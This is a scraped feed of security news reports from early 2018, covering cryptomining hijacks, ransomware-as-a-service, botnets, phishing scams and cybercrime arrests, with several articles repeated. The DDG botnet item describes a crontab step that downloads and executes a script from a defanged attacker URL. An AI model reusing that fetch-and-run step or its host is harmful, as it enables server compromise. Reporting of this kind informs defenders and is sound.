Texthelp confirmed that “no customer data has been accessed or lost,” and “customers will receive a further update when the security investigation has been completed.”

The malicious code was removed by 1600 UTC today, the UK’s ICO is currently in a minimal “maintenance” mode as a precaution.

 

 

Pierluigi Paganini

(Security Affairs – Browsealoud plugin, cryptocurrency mining script)

The post Thousands of websites worldwide hijacked by cryptocurrency mining code due Browsealoud plugin hack appeared first on Security Affairs.



Security Affairs

Thousands of websites worldwide hijacked by cryptocurrency mining code due Browsealoud plugin hack

Thousands of websites worldwide hijacked by a cryptocurrency mining code due to the hack of the popular Browsealoud plugin.

A massive attack hit thousands of websites around the world, crooks deployed Coinhive scripts forcing them to secretly mine cryptocurrencies on visitors’ browsers.

The list of compromised websites (4275) includes the UK’s NHS, Information Commissioner’s Office (ICO) (ico.org.uk), the UK’s Student Loans Company (slc.co.uk), The City University of New York (cuny.edu), and the US government’s court system.

Once discovered the hack some sites web down, the ICO also took its website down.

The compromised websites use the Browsealoud plugin which makes their content accessible for blind or partially sighted people by reading it.

In a time-window of roughly seven hours (between 0300 and 1145 UTC), all the websites using Browsealoud inadvertently ran the Monero cryptocurrency mining code.

The attackers injected an obfuscated version of the mining code in the plugin that once converted from hexadecimal back to ASCII allowed to load the mining code in the webpage.

cryptocurrency mining script obfuscated_mining_code

The alarm was thrown by the security expert Scott Helme who was contacted by a friend who sent him antivirus software warnings received after visiting a UK ICO website.

“This type of attack isn’t new – but this is the biggest I’ve seen. A single company being hacked has meant thousands of sites impacted across the UK, Ireland and the United States.said Helme.

“Someone just messaged me to say their local government website in Australia is using the software as well.”

The expert suggests using the Subresource Integrity (SRI) technique to block unwanted code injected in affected websites.

Texthelp, the company that developed the Browsealoud plugin, has removed its Browsealoud code from the web to stop the cryptocurrency mining operation.

“In light of other recent cyber attacks all over the world, we have been preparing for such an incident for the last year and our data security action plan was actioned straight away,” said Texthelp’s chief technology officer Martin McKay in a statement.

“Texthelp has in place continuous automated security tests for Browsealoud, and these detected the modified file and as a result the product was taken offline.”

Texthelp confirmed that “no customer data has been accessed or lost,” and “customers will receive a further update when the security investigation has been completed.”

The malicious code was removed by 1600 UTC today, the UK’s ICO is currently in a minimal “maintenance” mode as a precaution.

 

 

Pierluigi Paganini

(Security Affairs – Browsealoud plugin, cryptocurrency mining script)

The post Thousands of websites worldwide hijacked by cryptocurrency mining code due Browsealoud plugin hack appeared first on Security Affairs.

Security Affairs: FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins

Russian authorities have arrested some employees at the Russian Federation Nuclear Center facility because they are suspected for trying to using a supercomputer at the plant to mine Bitcoin.

The peaks reached by the values of principal cryptocurrencies is attracting criminal organizations, the number of cyber-attacks against the sector continues to increase, and VXers are focusing their efforts on the development of cryptocurrency/miner malware.

In a few days, security firms have spotted several huge botnets that were used by crooks to mine cryptocurrencies.

This week, security experts at  Radiflow, a provider of cybersecurity solutions for critical infrastructure, have discovered in a water utility the first case of a SCADA network infected with a Monero cryptocurrency-mining malware.

Radiflow, a provider of cybersecurity solutions for critical infrastructure, today announced that the company has revealed the first documented cryptocurrency malware attack on a SCADA network of a critical infrastructure operator.” reads the press release published by the company.

The Radiflow revealed that the cryptocurrency malware was designed to run in a stealth mode on a target system and even disable security software.

“Cryptocurrency malware attacks involve extremely high CPU processing and network bandwidth consumption, which can threaten the stability and availability of the physical processes of a critical infrastructure operator,” explained Yehonatan Kfir, CTO at Radiflow. “While it is known that ransomware attacks have been launched on OT networks, this new case of a cryptocurrency malware attack on an OT network poses new threats as it runs in stealth mode and can remain undetected over time.”

A cryptocurrency malware infection could have e dramatic impact on ICS and SCADA systems because it could increase resources consumption affecting the response times of the systems used to control processes in the environments.

While the story was making the headlines, the Russian Interfax News Agency reported that several scientists at the Russian Federation Nuclear Center facility (aka All-Russian Research Institute of Experimental Physics) had been arrested by authorities charged for mining cryptocurrency with “office computing resources.”

The nuclear research plant is located in Sarov, in 2011, the Russian Federation Nuclear Center deployed on a new petaflop-supercomputer.

The scientists are accused to have abused the computing power of one of Russia’s most powerful supercomputers located in the Federal Nuclear Center to mine Bitcoins.

Russian Federation Nuclear Center facility

The supercomputer normally isolated from the Internet, but the researchers were discovered while attempting to connect it online. the Federal Security Service (FSB) has arrested the researchers.

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” Tatyana Zalesskaya, head of the Institute’s press service, told Interfax news agency.

“Their activities were stopped in time. The bungling miners have been detained by the competent authorities. As far as I know, a criminal case has been opened regarding them,”

 

Pierluigi Paganini

(Security Affairs – Russian Federation Nuclear Center facility, Mining)

The post FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins appeared first on Security Affairs.



Security Affairs

FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins

Russian authorities have arrested some employees at the Russian Federation Nuclear Center facility because they are suspected for trying to using a supercomputer at the plant to mine Bitcoin.

The peaks reached by the values of principal cryptocurrencies is attracting criminal organizations, the number of cyber-attacks against the sector continues to increase, and VXers are focusing their efforts on the development of cryptocurrency/miner malware.

In a few days, security firms have spotted several huge botnets that were used by crooks to mine cryptocurrencies.

This week, security experts at  Radiflow, a provider of cybersecurity solutions for critical infrastructure, have discovered in a water utility the first case of a SCADA network infected with a Monero cryptocurrency-mining malware.

Radiflow, a provider of cybersecurity solutions for critical infrastructure, today announced that the company has revealed the first documented cryptocurrency malware attack on a SCADA network of a critical infrastructure operator.” reads the press release published by the company.

The Radiflow revealed that the cryptocurrency malware was designed to run in a stealth mode on a target system and even disable security software.

“Cryptocurrency malware attacks involve extremely high CPU processing and network bandwidth consumption, which can threaten the stability and availability of the physical processes of a critical infrastructure operator,” explained Yehonatan Kfir, CTO at Radiflow. “While it is known that ransomware attacks have been launched on OT networks, this new case of a cryptocurrency malware attack on an OT network poses new threats as it runs in stealth mode and can remain undetected over time.”

A cryptocurrency malware infection could have e dramatic impact on ICS and SCADA systems because it could increase resources consumption affecting the response times of the systems used to control processes in the environments.

While the story was making the headlines, the Russian Interfax News Agency reported that several scientists at the Russian Federation Nuclear Center facility (aka All-Russian Research Institute of Experimental Physics) had been arrested by authorities charged for mining cryptocurrency with “office computing resources.”

The nuclear research plant is located in Sarov, in 2011, the Russian Federation Nuclear Center deployed on a new petaflop-supercomputer.

The scientists are accused to have abused the computing power of one of Russia’s most powerful supercomputers located in the Federal Nuclear Center to mine Bitcoins.

Russian Federation Nuclear Center facility

The supercomputer normally isolated from the Internet, but the researchers were discovered while attempting to connect it online. the Federal Security Service (FSB) has arrested the researchers.

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” Tatyana Zalesskaya, head of the Institute’s press service, told Interfax news agency.

“Their activities were stopped in time. The bungling miners have been detained by the competent authorities. As far as I know, a criminal case has been opened regarding them,”

 

Pierluigi Paganini

(Security Affairs – Russian Federation Nuclear Center facility, Mining)

The post FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins appeared first on Security Affairs.

The cyber threat hunting game has changed

Threat hunting has evolved into a modern day sport, as cybersecurity companies scour the Dark Web to be the first to define a new vulnerability, type of malware or attack

The post The cyber threat hunting game has changed appeared first on The Cyber Security Place.

US authorities dismantled the global cyber theft ring known as Infraud Organization

The US authorities have dismantled a global cybercrime organization tracked Infraud Organization involved in stealing and selling credit card and personal identity data.

The US authorities have taken down a global cybercrime organization, the Justice Department announced indictments for 36 people charged with being part of a crime ring specialized in stealing and selling credit card and personal identity data.

According to the DoJ, the activities of the ring tracked as ‘Infraud Organization’, caused $530 million in losses. The group is active since 2010, when it created in Ukraine by Svyatoslav Bondarenko.

Bondarenko remains at large, but Russian co-founder Sergey Medvedev has been arrested by the authorities.

Most of the crooks were arrested in the US (30), the remaining members come from Australia, Britain, France, Italy, Kosovo, and Serbia.

The indicted leaders of the organization included people from the United States, France, Britain, Egypt, Pakistan, Kosovo, Serbia, Bangladesh, Canada and Australia.

The motto of the Infraud Organization was “In Fraud We Trust,” it has a primary role in the criminal ecosystem as a “premier one-stop shop for cybercriminals worldwide,” explained the Deputy Assistant Attorney General David Rybicki.

“As alleged in the indictment, Infraud operated like a business to facilitate cyberfraud on a global scale,” said Acting Assistant Attorney General John Cronan.

The platform offered a privileged aggregator for criminals (10,901 approved “members” in early 2017) that could buy and sell payment card and personal data.

“Members ‘join the Infraud Organization via an online forum. To be granted
membership, an Infraud Administrator must approve the request. Once granted
membership, members can post and pay for advertisements within the Infraud forum. Members may move up and down the Infraud hierarchy.” said the indictment.

“The Infraud Organization continuously screens the wares and services of the vendors within the forum to ensure quality products. Vendors who are considered subpar are swiftly identified and punished by the Infraud Organization’s Administrators.”

Infraud Organization

The Infraud Organization used a number of websites to commercialize the data, it implemented a classic and efficient e-commerce for the stolen card and personal data, implementing also a rating and feedback system and an escrow” service for payments in digital currencies like Bitcoin.

 

 

Pierluigi Paganini

(Security Affairs – Infraud Organization, cybercrime)

The post US authorities dismantled the global cyber theft ring known as Infraud Organization appeared first on Security Affairs.

Hacker Group threatens students and schools

According to a warning issued by the Cyber Division of the FBI and the Department of Education's Office of the Inspector General on 31 January, a hacker group called “TheDarkOverlord” (TDO) has tried to sell over 100 million private records and as for January, is responsible for over 69 attacks on schools and other businesses.

TDO is also allegedly responsible for the release of over 200,000 records including the PII of over 7,000 students due to nonpayment of ransoms.

The warning describes the group as “a loosely affiliated group of highly trained hackers” who, since April 2016, have “conducted various extortion schemes with a recent focus on the public school system.”

The warning says that TDO uses remote access tools to breach school district networks and steal sensitive data, which they then use to extort money from its victims, including students.

According to the report, TDO has also threatened violence in case of failure to meet demands.

Initially, TDO communicated their demands via email with threats of publicly releasing stolen data, but the warning notes that in September 2017, “TDO escalated its tactics by threatening school shootings through text messages and emails directed at students, staff, and local law enforcement officials.”

This caused several schools to shut down for few days as a precaution.

TDO was allegedly connected to multiple threats of violence on school campuses, however, the report says that while these threats caused panic, they “provided TDO with no apparent monetary gain.”

In a recent incident, TDO threatened to publicize the sensitive behavioral reports and private health information of students.

The FBI also recommends that victims do not give in to the ransom demands, as it does not guarantee regaining access to sensitive data. Rather, they advice to contact law enforcement, retain the original emails as evidence, and maintain a timeline of the attack, if possible.

Crime ring linked to Luminosity RAT dismantled by an international law enforcement operation

The Europol’s European Cybercrime Centre along with the UK NSA disclosed the details of an international law enforcement operation that dismantled a crime ring linked to Luminosity RAT.

The Europol’s European Cybercrime Centre (EC3) along with the UK National Crime Agency (NCA) disclosed the details of an international law enforcement operation that targeted the criminal ecosystem around the Luminosity RAT (aka LuminosityLink).

According to the EC3, the joint operation was conducted in September 2017, it involved more than a dozen law enforcement agencies from Europe, the US, and Australia.

The Luminosity RAT was first spotted in 2015 but it became very popular in 2016.

The malware was offered for sale in the criminal underground for as little as $40, it allows attackers to take complete control over the infected system.

Luminosity RAT

In September 2016, the UK law enforcement arrested a man that was linked to the threat. The arrest triggered a new investigation that resulted in several arrests, search warrants, and cease and desist notifications across Europe, America, and Australia.

Law enforcement agencies target both sellers and users of Luminosity Trojan. According to the NCA, a small crime ring in the UK distributed Luminosity RAT to more than 8,600 buyers across 78 countries.

“The Luminosity Link RAT (a Remote Access Trojan) enabled hackers to connect to a victim’s machine undetected. They could then disable anti-virus and anti-malware software, carry out commands such as monitoring and recording keystrokes, steal data and passwords, and watch victims via their webcams.” states the press release published by NCA.

“The RAT cost as little as £30 and users needed little technical knowledge to deploy it.

A small network of UK individuals supported the distribution and use of the RAT across 78 countries and sold it to more than 8,600 buyers via a website dedicated to hacking and the use of criminal malware.”

The Luminosity RAT was one of the malicious code used in Business Email Compromise attacks and was also used Nigerian gangs in attacks aimed at industrial firms.

Law enforcement believes that thousands of individuals were infected with the RAT.

“Victims are believed to be in the thousands, with investigators having already identified evidence of stolen personal details, passwords, private photographs, video footage and data. Forensic analysis on the large number of computers and internet accounts seized continues.” reads the announcement published by the Europol.

“Through such strong, coordinated actions across national boundaries, criminals across the world are finding out that committing crimes remotely offers no protection from arrests. Nobody wants their personal details or photographs of loved ones to be stolen by criminals. We continue to urge everybody to ensure their operating systems and security software are up to date”. said Steven Wilson, Head of Europol’s European Cybercrime Centre.

 

Pierluigi Paganini

(Security Affairs – Luminosity RAT, cybercrime)

The post Crime ring linked to Luminosity RAT dismantled by an international law enforcement operation appeared first on Security Affairs.

Popular British hacktivist Lauri Love will not be extradited to US, UK Court Ruled

The popular British hacker Lauri Love (33) will not be extradited to stand trial in the US, the High Court of England and Wales ruled.

Lauri Love was accused of hacking into United States government websites, will not be extradited to stand trial in the U.S., the High Court of England and Wales ruled today.

The list of victims of the hacker includes the FBI, the Federal Reserve Bank, US Missile Defence Agency, National Aeronautics and Space Administration (NASA),  and the US Missile Defence Agency.

The decision of the Lauri Love’s extradition was taken at Westminster Magistrates’ Court in London in 2016, by District Judge Nina Tempia. If extradited, Love risks a sentence to up to 99 years in prison and a potential fine of up to $9 million.

Actually, the man would face a prison sentence in the UK following his five years of legal battle.

US Prosecutors believe that Lauri Love is a member of a hacker crew, they sustain that he was also involved in the OpLastResort campaign launched by Anonymous against the US Government.

Lauri Love hacktivist

Lord Chief Justice Lord Burnett of Maldon and Justice Ouseley halted the extradition after heard Lauri Love suffered severe mental illness, including Asperger syndrome, and depression, they fear the man should commit suicide if extradited.

“There have not been any incidents of self-harm in the past but I accept Mr Love has experienced suicidal thoughts intermittently, both in the past and now. Mr Love denied any suggestion that he had exaggerated his symptoms and his suicide risk which I accept given the medical evidence.” the High Court ruled on Monday.
“I also accept Professor Baron-Cohen and Professor Kopelman’s evidence that he would attempt suicide before extradition to the United States. Both are of the opinion he would be at high risk of suicide. I accept Professor BaronCohen’s oral evidence that Mr Love’s intention is not a reflection of a voluntary plan or act but due to his mental health being dependant on him being at home with his parents and not being detained for an indefinite period.”

The court recognized that extradition would be “oppressive” due to the man’s health conditions. Love supporters that were present in the court applauded the judgment.

The Crown Prosecution Service (CPS), which acts on behalf of the US authorities, would examine the judgment before deciding whether to appeal the high court decision to the supreme court.

“I’m thankful for all the support we’ve had, without which I’m not sure I would have made it this far.” commented Love expressing gratitude to the judges.

The judgment was accepted with joy in the hacking community and by human rights advocates.

Pierluigi Paganini

(Security Affairs – Lauri Love, hacking)

The post Popular British hacktivist Lauri Love will not be extradited to US, UK Court Ruled appeared first on Security Affairs.

API Security Concerns Are on the Rise

In an application-centric, cloud-native world, businesses have a heightened concern for cybersecurity risk related to API use of late: Specifically, 63% of respondents in a recent survey said they are

The post API Security Concerns Are on the Rise appeared first on The Cyber Security Place.

Security Affairs: GandCrab, a new ransomware-as-a-service emerges from Russian crime underground

Experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service dubbed GandCrab. advertised in Russian hacking community on the dark web.

Experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service in the dark web dubbed GandCrab.

GandCrab raas

The GandCrab was advertised in Russian hacking community, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

“Over the last three days LMNTRIX Labs has been tracking an influx of GandCrab ransomware. The ransomware samples are being pushed by RIG Exploit delivery channels.” reads the analysis published by LMNTRIX.

GandCrab raas

As usually happen for Russian threat actors, members cannot use the ransomware to infect systems in countries in the former Soviet Republics that now comprise the Commonwealth of Independent States.

Below some interesting points from the advertisement:

  • Prospective buyers are asked to join the ‘partner program’, in which profits from the ransomware are split 60:40
  • Large’ partners are able to increase their percentage of proceeds to 70 per cent
  • As a Ransomware-as-a-service offering, technical support and updates are offered to ‘partners’
  • Partners are prohibited from targeting countries in the Commonwealth of Independent States (Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Uzbekistan and Ukraine) – violating this rule results in account deletion
  • Partners must apply to use the ransomware, and there is a limited amount of ‘seats’ available.” reads the translation of the ad.

The operators behind the RaaS offer they platform maintaining 40% of the ransom, the percentage is reduced to 30% for large partners.

Once infected, if the victim does not pay on time, he will have to pay a double ransom.

Other specific features related to GandCrab RaaS is the that it allows payment using the cryptocurrency Dash and the service is provided by a server hosted on a .bit domain.

The authors of the GandCrab RaaS also offers technical support and updates to its members, they also published a video tutorial that shows how the ransomware is able to avoid antivirus detection.

The RaaS implements a user-friendly admin console, which is accessible via Tor Network, to allow malware customization (i.e. ransom amount, individual bots and encryption masks)

The experts shared the Indicators of Compromise in their blog post.

 

Pierluigi Paganini

(Security Affairs – GandCrab RaaS, cybercrime)

The post GandCrab, a new ransomware-as-a-service emerges from Russian crime underground appeared first on Security Affairs.



Security Affairs

GandCrab, a new ransomware-as-a-service emerges from Russian crime underground

Experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service dubbed GandCrab. advertised in Russian hacking community on the dark web.

Experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service in the dark web dubbed GandCrab.

GandCrab raas

The GandCrab was advertised in Russian hacking community, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

“Over the last three days LMNTRIX Labs has been tracking an influx of GandCrab ransomware. The ransomware samples are being pushed by RIG Exploit delivery channels.” reads the analysis published by LMNTRIX.

GandCrab raas

As usually happen for Russian threat actors, members cannot use the ransomware to infect systems in countries in the former Soviet Republics that now comprise the Commonwealth of Independent States.

Below some interesting points from the advertisement:

  • Prospective buyers are asked to join the ‘partner program’, in which profits from the ransomware are split 60:40
  • Large’ partners are able to increase their percentage of proceeds to 70 per cent
  • As a Ransomware-as-a-service offering, technical support and updates are offered to ‘partners’
  • Partners are prohibited from targeting countries in the Commonwealth of Independent States (Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Uzbekistan and Ukraine) – violating this rule results in account deletion
  • Partners must apply to use the ransomware, and there is a limited amount of ‘seats’ available.” reads the translation of the ad.

The operators behind the RaaS offer they platform maintaining 40% of the ransom, the percentage is reduced to 30% for large partners.

Once infected, if the victim does not pay on time, he will have to pay a double ransom.

Other specific features related to GandCrab RaaS is the that it allows payment using the cryptocurrency Dash and the service is provided by a server hosted on a .bit domain.

The authors of the GandCrab RaaS also offers technical support and updates to its members, they also published a video tutorial that shows how the ransomware is able to avoid antivirus detection.

The RaaS implements a user-friendly admin console, which is accessible via Tor Network, to allow malware customization (i.e. ransom amount, individual bots and encryption masks)

The experts shared the Indicators of Compromise in their blog post.

 

Pierluigi Paganini

(Security Affairs – GandCrab RaaS, cybercrime)

The post GandCrab, a new ransomware-as-a-service emerges from Russian crime underground appeared first on Security Affairs.

More than 1 million worth of ETH stolen from Bee Token ICO Participants with phishing emails

Participants to the Bee Token ICO were robbed for 100s of ETH, scammers sent out a phishing email stating that the ICO was now open, followed by an Ethereum address they controlled.

Another day, another incident involving cryptocurrencies, hundreds of users fell victims to email scams in the last days.

The victims were tricked by scammers into sending more than $1 million worth of Ethereum to them as part of Bee Token ICO (Initial Coin Offering). Bee Token is a blockchain-based home sharing service, it launched the ICO on January 31 and ended on February 2, when the Bee team obtained the $5 million necessary to start their project.

During the period of the ICO, the crooks sent phishing emails posing as the Bee Token ICO.

The scammers, impersonating the Bee team, sent out emails with a character of urgency to the potential investors inviting them to buy Bee Tokens by transferring Ethereum coins to their wallets.

The scammers attempted to convince users to participate to the ICO by sending Ethereum spreading the news that the company started a partnership with Microsoft and would be giving participants a 100% bonus for all contributions in the next 6 hours.

Cybercriminals also guaranteed that the value of Bee Token would double within 2 months, or participants would receive their RTH back.

“Today, investors who were eagerly waiting for their opportunity to join the Bee Token ICO were robbed for 100s of ETH. Scammers managed to get their hands on the Bee Token mailing list and sent out a phishing email stating that the ICO was now open, followed by an Ethereum address to send their contributions to.” states the blog post published TheRippleCryptocurrency.

After the Bee team became aware of fraudulent activity it issued three security alerts to warn of the ongoing scam:

The Bee Token team has been made aware of phishing sites that have copied the Bee Token website in an attempt to deceive users into sending them their money. Please DO NOT trust any website other than https://www.beetoken.com/ . REPEAT: DO NOT trust any website other than https://www.beetoken.com/reads one of the Bee Token Security Notice.

The Bee Token team also created a Google scam reporting form to allow users to report scams.

The RippleCryptocurrency.com had access to two different versions of the email that reported the following Ethereum addresses used by crooks:

a third one was reported on Reddit by users:

The overall amount of money contained in the three wallets at the end of the ICO was over $1 million.

Unfortunately such kind of incident is not uncommon, for this reason, Facebook banned ads for ICOs and cryptocurrencies on its social network.

Pierluigi Paganini

(Security Affairs – Bee Tokens, scam)

The post More than 1 million worth of ETH stolen from Bee Token ICO Participants with phishing emails appeared first on Security Affairs.

Japan’s Financial Services Agency raided the Coincheck headquarters in Tokyo after the hack

 

Cryptocurrencies are in the middle of a Tempest, on Thursday India announced it would adopt measures to prevent the use of virtual currencies in the country, the value of Bitcoin dropped below $9,000 for the first time since November. Finance Minister Arun Jaitley, in his annual budget, explained its government would “take all measures to eliminate use of these crypto-assets in financing illegitimate activities or as part of the payment system”.

coincheck hack coindesk

A week after the security breach suffered by the virtual currency exchange Coincheck, Japanese authorities raided the company.

The hackers stole 58 billion yen ($530 million), an amount of money that is greater than the value of bitcoins which disappeared from MtGox in 2014.

After the MtGox case, the Japanese government passed a law on cryptocurrencies that assigns to the FSA the tack of regulating the exchanges operating in the country.

Coincheck had submitted an application to the FSA for a licence, the company was waiting for the permission.

This week, Coincheck announced it will refund about $400 million to 260,000 customers after the hack, the company will use its own funds.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia. The company announced it will refund about $400 million to customers after the hack. 

Japanese media criticized the company blaming the management to have underestimated the importance of security of its investor, they said Coincheck “expanded business by putting safety second”.

On Friday, agents of the Financial Services Agency raided the Coincheck’s headquarters in Tokyo’s Shibuya district with the intent to verify that the company adopted proper security measures to protect its assets.

“We have launched an on-site inspection to ensure preservation of clients’ assets,” said Finance Minister Taro Aso.

Japan’s Financial Services Agency gave Coincheck until February 13 to investigate the hack, implements additional security measures and “properly” deal with the affected clients.

According to Japanese bitcoin monitoring site Jpbitcoin.com, in November, yen-denominated bitcoin trades reached a record 4.51 million bitcoins, or nearly half of the world’s major exchanges of 9.29 million bitcoin.

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

The post Japan’s Financial Services Agency raided the Coincheck headquarters in Tokyo after the hack appeared first on Security Affairs.

JenX botnet leverages Grand Theft Auto videogame community to infect devices

Researchers at security firm Radware have spotted a new IoT botnet, dubbed JenX, the leverages the Grand Theft Auto videogame community to infect devices.

Researchers at security firm Radware have spotted a new IoT botnet, dubbed JenX, that exploits vulnerabilities triggered by the Satori botnet and is leveraging the Grand Theft Auto videogame community to infect devices.

The activity of the Satori botnet has been observed in 2017 by researchers from Check Point security, it uses A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532.

JenX exploits the CVE-2014-8361 (Realtek SDK Miniigd UPnP SOAP command execution) and CVE-2017-17215 (Huawei Router HG532 arbitrary command execution). that affect Huawei and Realtek routers.

“A new botnet recently started recruiting IoT devices. The botnet uses hosted servers to find and infect new victims leveraging one of two known vulnerabilities that have become popular in IoT botnets recently:

“Both exploit vectors are known from the Satori botnet and based on code that was part of a recent public Pastebin post by the “Janit0r,” author of “BrickerBot.”

JenX also implemented some techniques used by the recently discovered PureMasuta botnet.

The command-and-control server is hosted at the site San Calvicie, which offers multiplayer mod support for Grand Theft Auto: San Andreas, and also DDoS-for-hire service.

JenX is a DDoS botnet, the DDoS  option offered by San Calvicie is called “Corriente Divina.”

The users of the website can rent a GTA San Andreas multiplayer modded server for $16 and a Teamspeak server goes for $9. Adding $20 it is possible to power massive DDoS attacks that can peak 290 and 300 Gbps.

“The Corriente Divina (‘divine stream’) option is described as ‘God’s wrath will be employed against the IP that you provide us,” wrote Radware’s Cyber Security expert Pascal Geenens. “It provides a DDoS service with a guaranteed bandwidth of 90-100 Gbps and attack vectors including Valve Source Engine Query and 32 bytes floods, TS3 scripts and a ‘Down OVH’ option which most probably refers to attacks targeting the hosting service of OVH, a cloud hosting provider that also was a victim of the original Mirai attacks back in September 2016. OVH is well known for hosting multi-player gaming servers such as Minecraft, which was the target of the Mirai attacks at the time.”

jenx botnet

Differently from Satori and PureMasuta botnets, JenX has a centralized infrastructure, it uses a central server to perform the scanning of new hosts.

“The drawback of the central approach is a less than linear growth with the number of deployed servers. Much slower compared to the exponential growth rate of and less aggressive than distributed scanning botnets,” continues the analysis.

The presence of a central server that coordinates the activity makes it easy for law enforcement and security firms to take down the botnet. Of course, threat actors can deploy the control server to the Dark Web making hard take over from law enforcement.

Even if the JenX is able to power massive DDoS attacks, for now, is doesn’t represent a  serious threat because it aims to disrupt services from competing for GTA SA multiplayer servers.

“The botnet is supposed to serve a specific purpose and be used to disrupt services from competing GTA SA multiplayer servers. I do not believe that this will be the botnet that will take down the internet,” Geenens concluded.

“But it does contain some interesting new evolutions and it adds to a list of IoT botnets that is growing longer and faster every month! That said, there is nothing that stops one from using the cheap $20 per target service to perform 290Gbps attacks on business targets and even government related targets. I cannot believe the San Calvicie group would oppose to it.”

Pierluigi Paganini

(Security Affairs – JenX botnet, IoT)

The post JenX botnet leverages Grand Theft Auto videogame community to infect devices appeared first on Security Affairs.

DDG, the second largest mining botnet targets Redis and OrientDB servers

Researchers at Qihoo 360’s Netlab analyzed a new campaign powered by the DDG botnet, the second largest mining botnet of ever, that targets Redis and OrientDB servers.

A new Monero-mining botnet dubbed DDG was spotted in the wild, the malware targets Redis and OrientDB servers.

According to the researchers at Qihoo 360’s Netlab, the DDG botnet was first detected in 2016 and is continuously updated throughout 2017.

“Starting 2017-10-25, we noticed there was a large scale ongoing scan targeting the OrientDB databases. Further analysis found that this is a long-running botnet whose main goal is to mine Monero CryptoCurrency. We name it DDG.Mining.Botnet after its core function module name DDG.” reads the analysis published by Netlab.

The miner has already infected nearly 4,400 servers and has mined over $925,000 worth of Monero since March 2017, DDG is among the largest mining botnets.

Yesterday I wrote about the greatest mining botnet called Smominru that has infected over 526,000 Windows machines, its operators had already mined approximately 8,900 Monero ($2,346,271 at the current rate).

The malware exploits the remote code execution vulnerability CVE-2017-11467 to compromise OrientDB databases and targets Redis servers via a brute-force attack.

Crooks are focusing their efforts on attacks against servers that usually have significant computing capabilities.

The attack chain described by the researchers from Qihoo 360’s Netlab is composed of the following steps:

  • Initial Scanning: The attacker (ss2480.2) exploits the known RCE vulnerability of the OrientDB database and drops the attack payload
  • Stage 1: Attackers modify local Crontab scheduled tasks, download and execute i.sh (hxxp: //218.248.40.228:8443/i.sh) on the primary server and keep it synchronized every 5 minutes
  • Stage 2: DDG traverses the built-in file hub_iplist.txt, check the connectivity of every single entry and try to download the corresponding Miner program wnTKYg from the one can be successfully connected (wnTKYg.noaes if the native CPU does not support AES-NI)
  • Mining Stage: The Miner program begins to use the computing resources of the compromised host to begin mining for the attacker’s wallet.

The following image shows the DDG Mining Botnet attack process:

DDG botnet

The researchers conducted sinkholing of the botnet traffic and observed 4,391 IP addresses of compromised servers from all countries. Most of the infections is in China (73%), followed by the United States (11%), the botnet is mainly composed of compromised Redis databases (88%).

Cybercriminals are using three wallet addresses, the botnet mined 3,395 Monero ($925,000), but researchers also discovered another wallet containing 2,428 Monero ($660,000).

“The total income is Monroe 3,395 or 5,760. These tokens are worth USD 925,383 or 1,569,963 today. Note: There is an issue for the second wallet, where “Total Paid” is not consistent with the summary of all tractions’ amount. We cannot confirm which number is more accurate, so we show both numbers here.” continues the analysis.

Further information including the IoCs are included in the technical report published by Qihoo 360’s Netlab.

 

Pierluigi Paganini

(Security Affairs – DDG botnet, mining)

The post DDG, the second largest mining botnet targets Redis and OrientDB servers appeared first on Security Affairs.

Watch out, cyber criminals are using fake FBI emails to infect your computer

The FBI Internet Crime Complaint Center (IC3) is warning of a new malware campaign aimed at infecting victims with weaponized attachments.

The Feds’ Internet Crime Complaint Center (IC3) is warning of a new spam campaign aimed at infecting victims with a ransomware. According to an alert issued on Wednesday by the IC3, numerous citizens filled complaints after received emails purporting to be from IC3. The message pretends to be the compensation from a cyber attack and asks the victims to fill the attached document, but the file is laced with malware.

The story is interesting, the email reports that a Nigerian cyber criminal had been arrested and feds have found the recipient’s email address of the alleged scammer’s PC. The email asks victims to return the document with recipient info and wait for the refund to arrive. Once the victim has opened the document, the infection process will start.

FBI

The FBI has identified at least three other versions of the IC3 impersonation scam:

  • “The first involved a fake IC3 social media page, which advertised itself as the FBI Cyber Crime Department (IC3) and requested recipients provide personal information in order to report an internet crime.” states the alert issued by the FBI. “
  • “The second involved an email which stated the recipient was treated unfairly by various banks and courier companies. The email claimed the recipient’s name was found in a financial company’s database and that they will be compensated for this unfair treatment.”
  • “The third example involved an email from the Internet Crime Investigation Center/Cyber Division and provided an address in Minneapolis, Minnesota. The email also included a case reference number in the subject line. The email informed the recipient that their IP address was referred to the IC3 as a possible victim of a federal cyber-crime. The email then requests the recipient to contact the sender via telephone.”

FBI is currently investigating the cases, victims of an online scam can file a complaint with the IC3 at www.ic3.gov.

 

Pierluigi Paganini

(Security Affairs – FBI, malware)

The post Watch out, cyber criminals are using fake FBI emails to infect your computer appeared first on Security Affairs.

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

